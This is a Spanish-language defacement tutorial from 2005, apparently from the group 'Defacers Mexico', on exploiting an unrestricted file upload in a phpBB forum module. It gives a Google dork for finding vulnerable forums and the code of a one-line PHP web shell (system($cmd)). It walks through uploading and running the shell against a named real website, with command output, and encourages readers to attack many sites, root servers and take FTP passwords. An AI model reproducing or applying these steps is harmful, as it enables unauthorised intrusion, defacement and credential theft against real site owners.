############################################################################
*/
Http://Www.Defacers.Com.Mx */ | Deface en phpBB mediante Upload
############################################################################
sh-2.05# ./ Escrito por Status-x [ phr4xz @gmail.com ] - Mexico
############################################################################
_=_=_=_==_=_=_=_=_=_=_=_=_=_=_==_=_=_=_=_=_=_=_=_=_=_==_=_=_=_=_=_=_=_=_=_=_
| * Saludos * |
Pues ahora les traigo un tutorial que he decidido hacer publico ya que pues
el bug lo publique en Security Focus, pueden verlo en:
Security Tracker:
http://securitytracker.com/alerts/2005/Apr/1013671.html Security Focus:
http://securityfocus.com/bid/13084 Esta tecnica la vengo explotando desde hace algunos meses sin revelarla a
nadie pero pues ahora no le veo el caso a seguirla guardando asi que aqui
la tienen disponible y pues denle duro.
Por cuestiones que no mencionare, no pondre la forma mas exitosa de hallar
foros phpBB con este modulo por lo cual solo les pondre algunos ejemplos.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
| * Buscando Victimas * |
Como lo mencione arriba no voy a poner la url donde se encuentran muchas
paginas las cuales atacar sin embargo les pondre algunos ejemplos:
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
http://www.google.com.mx/search?hl=es&q=allinurl%3A+%2Fforum%2Fup.php&meta= """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Como ejemplo pondre la siguiente web:
http://www.surreallyinsane.com Y por lo que veo el advisory tuvo exito ya que ya hay php-shells que antes
no estaban
Comenzemos....
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
| * Explotando el fallo * |
El fallo consiste en subir archivos al servidor y ejecutar comandos
asi
de simple, y esto se debe a que el script nos deja subir cualquier clase de
archivos asi que primero que nada crearemos nuestro archivo " cmd.php "
con el siguiente codigo:
--------------
<?
system($cmd)
?>
--------------
En seguida nos iremos a la url:
===========================================
http://www.surreallyinsane.com/forum/up.php ===========================================
Y subiremos nuestro archivo cmd.php, el cual se subira a la carpeta:
"uploads"
Asi que lo abriremos y veremos el siguiente mensaje:
-----------------------------------------------------------------
Warning: system(): Cannot execute a blank command in
/home/surreallyinsane/public_html/forum/uploads/cmd.php on line 3
-----------------------------------------------------------------
Lo cual nos indica que ya esta listo para poder ejecutar comandos asi que
pues podemos obtener informacion del servidor por ejemplo:
---------------------------------------------------------------------------
http://www.surreallyinsane.com/forum/uploads/cmd.php?&cmd=uname%20-a;pwd;id Linux brown.srv2.com 2.4.22-1.2199.nptl #1 Wed Aug 4 12:25:07 EDT 2004 i686
athlon i386 GNU/Linux /home/surreallyinsane/public_html/forum/uploads
uid=99(nobody) gid=99(nobody) groups=99(nobody)
---------------------------------------------------------------------------
El servidor chance y se lo pueden rootear o tambien pueden obtener el
archivo de configuracion del foro, con lo cual tendrian el password del ftp
aunque esto no es seguro
Sin embargo pues haber que tal les va y no se desanimen hay muchos sitios
vulnerables todo es cosa de saberle buscar....
Por cierto en algunos host no muestra el mensaje de Warning.... solo hay
que cambiar la funcion system por passthru por ejemplo
.
_=_=_=_==_=_=_=_=_=_=_=_=_=_=_==_=_=_=_=_=_=_=_=_=_=_==_=_=_=_=_=_=_=_=_=_=_
| * Despedida * |
Pues ya me canse de todos los putos que copian los tutoriales asi que pues
este tal vez sea uno de los ultimos de mi autoria si no es que el ultimo
ya que de yo seguir viendo que la gente los copia pues simplemente dejare
de hacerlos para ver que explicacion ponen estas personitas en sus sitios..
Que se les acabaron las ideas? no lo creo, Sean honestos y dejen todo intac
to
...
Atte: Status-x | phr4xz @gmail.com |
############################################################################
sh-2.05b$ ./ exit
Copyright 2005 Defacers Mexico - No modificar sin permiso de su autor
Si publicas este texto en tu sitio por favor no lo modifiques
############################################################################
Autor: Status-x
Autor